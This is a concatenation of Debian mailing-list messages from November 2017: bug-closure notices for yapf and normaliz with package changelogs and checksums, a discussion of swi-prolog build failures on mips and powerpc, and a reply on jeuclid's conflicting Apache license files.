yapf, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 880...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ana Custura  (supplier of updated yapf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 13 Nov 2017 18:11:05 +
Source: yapf
Binary: python-yapf yapf python3-yapf yapf3
Architecture: source all
Version: 0.19.0-1
Distribution: unstable
Urgency: medium
Maintainer: Ana Custura 
Changed-By: Ana Custura 
Description:
 python-yapf - public modules for yapf (Python 2)
 python3-yapf - public modules for yapf (Python 3)
 yapf   - Python code formatter for different styles (Python 2)
 yapf3  - Python code formatter for different styles (Python 3)
Closes: 879196 880958
Changes:
 yapf (0.19.0-1) unstable; urgency=medium
 .
   * New upstream version 0.19.0
   * debian/control:
 -splits package into modules and binaries (closes: #880958, #879196 )
 -updates Debian policy to 4.1.1
   * debian/rules:
 -enables tests at build-time
 -excludes test from running (see https://github.com/google/yapf/issues/469)
   * debian/tests/control:
 -enables testing with autopkgtest
Checksums-Sha1:
 95b6073d505f749fbac863518bd0bb47c6ddd9ed 1782 yapf_0.19.0-1.dsc
 b699ad5f7fbfe95324c4fd800e52c08644f4303f 131470 yapf_0.19.0.orig.tar.gz
 08fb66326cfc3ba181a7f5240d48d2d8a81c3591 3248 yapf_0.19.0-1.debian.tar.xz
 6ec78faccacbb48ef65c1037697084c12eaeefcb 99468 python-yapf_0.19.0-1_all.deb
 e6da8570ca52b2372182799b895b0de041e1ef41 99556 python3-yapf_0.19.0-1_all.deb
 1800f1ec3dd06d803930832bb04beb14459715da 20196 yapf3_0.19.0-1_all.deb
 0b087f4d55eea3a626401185f305b261362d22f0 20180 yapf_0.19.0-1_all.deb
 4ad97780c38849c1d0fca15a2846691c59fd6531 6522 yapf_0.19.0-1_amd64.buildinfo
Checksums-Sha256:
 7df09f3ba15b842f299a3cffc07351ec5d94b722443dee0b46b8e543e93731bc 1782 
yapf_0.19.0-1.dsc
 018d9b9ae31df87610c0dd1a96b3c76854a050674678db003fabe87707c57f8c 131470 
yapf_0.19.0.orig.tar.gz
 a3a3804c2d313f6f861bd7de1616729d127073374eef54803730884288d17409 3248 
yapf_0.19.0-1.debian.tar.xz
 e5c42c8d00ed0a8c7f5806a60dfc297eb0362e15b2e0cb4f3d5426f7e43391db 99468 
python-yapf_0.19.0-1_all.deb
 2ce7ea831d25791beb9547993b4567143e0f7997091c7695bb5fcceb3806c7b7 99556 
python3-yapf_0.19.0-1_all.deb
 6f92f093b51b160230f4aa5b927101f4912330fe82d2c96a4578b310daa328ed 20196 
yapf3_0.19.0-1_all.deb
 d4f360c1d609fc77740c6bd646e7b909bf1701da9c42b418ad3239002a5e57cb 20180 
yapf_0.19.0-1_all.deb
 1342a7f3f97caec42b5c2ab25d008bc0179a3d27e0149ab9c0ec78887704242a 6522 
yapf_0.19.0-1_amd64.buildinfo
Files:
 d5db521361c34478d927c1946d168d58 1782 python optional yapf_0.19.0-1.dsc
 5e828d4278bc3a55adf39d9640a6dffd 131470 python optional yapf_0.19.0.orig.tar.gz
 d5d1bec81bc3812963a911bb10e33150 3248 python optional 
yapf_0.19.0-1.debian.tar.xz
 b55039c2575b1b969e019fedb60522e7 99468 python optional 
python-yapf_0.19.0-1_all.deb
 321e19a05bf058e7ccc9cbee402f045b 99556 python optional 
python3-yapf_0.19.0-1_all.deb
 6f9a0e0a67b9e726ff5aa6520a802744 20196 python optional yapf3_0.19.0-1_all.deb
 763748f1f63ff7a5fccd92ca0acdb7e5 20180 python optional yapf_0.19.0-1_all.deb
 e1ea2643a20175f9120f2ab0a28fdf16 6522 python optional 

Bug#877210: marked as done (normaliz FTBFS on i386/armhf: Some error in the normaliz input data detected: Error while reading grading (a 1x2 matrix) !)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 09:00:20 +
with message-id 
and subject line Bug#877210: fixed in normaliz 3.4.1+ds-1
has caused the Debian Bug report #877210,
regarding normaliz FTBFS on i386/armhf: Some error in the normaliz input data 
detected: Error while reading grading (a 1x2 matrix) !
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
877210: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877210
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: normaliz
Version: 3.1.1+ds-1
Severity: serious
Tags: buster sid

Some recent change in unstable makes normaliz FTBFS on i386/armhf
(could be on all 32bit architectures):

https://tests.reproducible-builds.org/debian/history/normaliz.html
https://tests.reproducible-builds.org/debian/rb-pkg/unstable/i386/normaliz.html

...
/usr/bin/make -C test NORMALIZ=/build/1st/normaliz-3.1.1+ds/_build/normaliz
make[2]: Entering directory '/build/1st/normaliz-3.1.1+ds/test'
/build/1st/normaliz-3.1.1+ds/_build/normaliz  -s test-s/23
Some error in the normaliz input data detected: Error while reading grading (a 
1x2 matrix) !
BadInputException caught... exiting.
Makefile:54: recipe for target 'test-s/23.out' failed
make[2]: *** [test-s/23.out] Error 1
--- End Message ---
--- Begin Message ---
Source: normaliz
Source-Version: 3.4.1+ds-1

We believe that the bug you reported is fixed in the latest version of
normaliz, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 877...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jerome Benoit  (supplier of updated normaliz package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Wed, 15 Nov 2017 06:15:30 +
Source: normaliz
Binary: normaliz libnormaliz3 libnormaliz-dev libnormaliz-dev-common 
normaliz-bin normaliz-doc
Architecture: source all amd64
Version: 3.4.1+ds-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Science Maintainers 

Changed-By: Jerome Benoit 
Description:
 libnormaliz-dev - math computing tools for affine monoids, rational polytopes 
and c
 libnormaliz-dev-common - math computing tools for affine monoids, rational 
polytopes and c
 libnormaliz3 - math computing tools for affine monoids, rational polytopes and 
c
 normaliz   - math computing tools for affine monoids, rational polytopes and c
 normaliz-bin - math computing tools for affine monoids, rational polytopes and 
c
 normaliz-doc - math computing tools for affine monoids, rational polytopes and 
c
Closes: 877210
Changes:
 normaliz (3.4.1+ds-1) unstable; urgency=medium
 .
   * New upstream minor version (Closes: #877210).
   * Debianization:
 - debian/copyright, refresh;
 - debian/control:
   - debhelper, bump to 10 (see d/rules);
   - Standards Version, bump to 4.1.1 (no change);
   - discard the debug symbols package libnormaliz0-dbg;
   - Build-Depends-Indep field, neutralize;
 - debian/watch:
   - version, bump to 4;
   - path, refresh to upstream GitHUB site path;
 - debian/rules:
   - debhelper, bump to 10;
   - doc composition, neutralize.
Checksums-Sha1:
 28fff2497c0d786e5a440da2554dfe4c201dfa49 3078 normaliz_3.4.1+ds-1.dsc
 f88d2a7292576247f62913b0bbdc619ed7682b08 1334860 normaliz_3.4.1+ds.orig.tar.xz
 52ca94272727d32cd8bc84a7396c86e8a76b6e11 4928 normaliz_3.4.1+ds-1.debian.tar.xz
 2a454cb30707e6f428d6f86c626272105dbd43c0 24568 
libnormaliz-dev-common_3.4.1+ds-1_all.deb
 192cc9e5bb8d8258e9f170fd5b71afaec6b10ff6 551676 
libnormaliz-dev_3.4.1+ds-1_amd64.deb
 d447f91c6935b8a0dd91a6e128cef71c669e69fe 5473852 
libnormaliz3-dbgsym_3.4.1+ds-1_amd64.deb
 c0d8ec69032bcfff8a4770fb8c94079db2cdf9ce 589736 
libnormaliz3_3.4.1+ds-1_amd64.deb
 fddbb0e4acb339cc049a09152628165108fffbcb 671784 
normaliz-bin-dbgsym_3.4.1+ds-1_amd64.deb
 f088f1945d3939d37ef2fe45713b2359e50f8f48 73700 
normaliz-bin_3.4.1+ds-1_amd64.deb
 4b1d5e70a6ad78f6a4da8beba35cde9cdf9f0696 701284 normaliz-doc_3.4.1+ds-1_all.deb
 0e65d95ed239d6bf1196c1afd91d6fcfde7221c9 8309 

Bug#881756: swi-prolog: FTBFS on mips: Build killed with signal TERM

[Adrian Bunk]

On Wed, Nov 15, 2017 at 12:55:12AM +0500, Lev Lamberov wrote:
>...
> The most strange thing is that 7.6.1-1 built successfully on mips. The
> only difference between 7.6.1-1 and 7.6.1-2 is that java tests (only
> tests) are disabled now (via debian/rules).

7.3.33+dfsg-1 failed the same way a year ago:
https://buildd.debian.org/status/logs.php?pkg=swi-prolog=mips

I would not rule out that this might be an old bug causing random build 
failures, that either just happened twice in the row or became more 
likely due to some change somewhere.

> Note that the 7.6.1-2
> version builds successfully on mipsel and mips64el (little-endian), but
> fails on mips (big-endian).

> The similar problem occures on powerpc [1][2], which also works in
> big-endian mode:
>...

Same randomness on powerpcspe, and both have it already with 7.6.1+dfsg-1:
https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpc
https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpcspe

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Bug#876733: Licensing of jeuclid

[Michael Lustfield]

On Tue, 14 Nov 2017 15:55:40 +0100
Julien Puydt  wrote:

> Hi,
> 
> according to bug #876733, there is a licensing problem with jeuclid :
> - the LICENSE.txt file [1] says Apache 2.0 ;

LICENSE.txt showed up in revision b9d5f518ae61 (61) as a rename of LICENSE.
LICENSE showed up in revision 7a11e25aacfa (0) during a CVS import.

support/LICENSE.txt shows up in revision 472677a11fef (683).. and is Apache-2.0.

> - the NOTICE file [2] looks like an Apache 1.0.

NOTICE also showed up in revision 7a11e25aacfa (0).

NOTICE seems to be Apache-1.1 with word replacements. (not Apache-1.0)

> My interpretation of the issue is that if there are two licenses on the
> code, then as long as the necessary DFSG-rights are given, there is no
> problem.

I would argue that the Author's clear intention was to license this work under
Apache-2.0. This is where the full license text is correctly copied. A LICENSE
file is typically the authority to a project, so much so that many tools ignore
a NOTICE file when checking licenses if a LICENSE file is present.

Additionally, Apache-2.0 invalidates a contradicting license by paragraph 4(d).
What's in NOTICE violates the license terms of what's in LICENSE.

> Notice that upstream seems unreactive since years now, so even though
> I'm also opening a ticket there [3], moving forward not expecting an
> answer seems the most reasonable course of action.

Considering the last commit was in 2012, a lack of response is not in any way
surprising. You opened that ticket less than a day ago.

> What do you think about the matter?

I'd start by making an attempt to contact maxberger directly, and then
definitely have some patience. They may be on vacation, experiencing
health/family/existential problems, or prefer checking email infrequently.

If you don't get a response, I would argue that the author's clear intent was
to license the work under the Apache-2.0 license and believed the NOTICE file
was meant for a more brief form of the file. I would make that argument based
on the assumption that they didn't read the license, or the portion where it
tells you what the brief form looks like.

IANAL
-- 
Michael Lustfield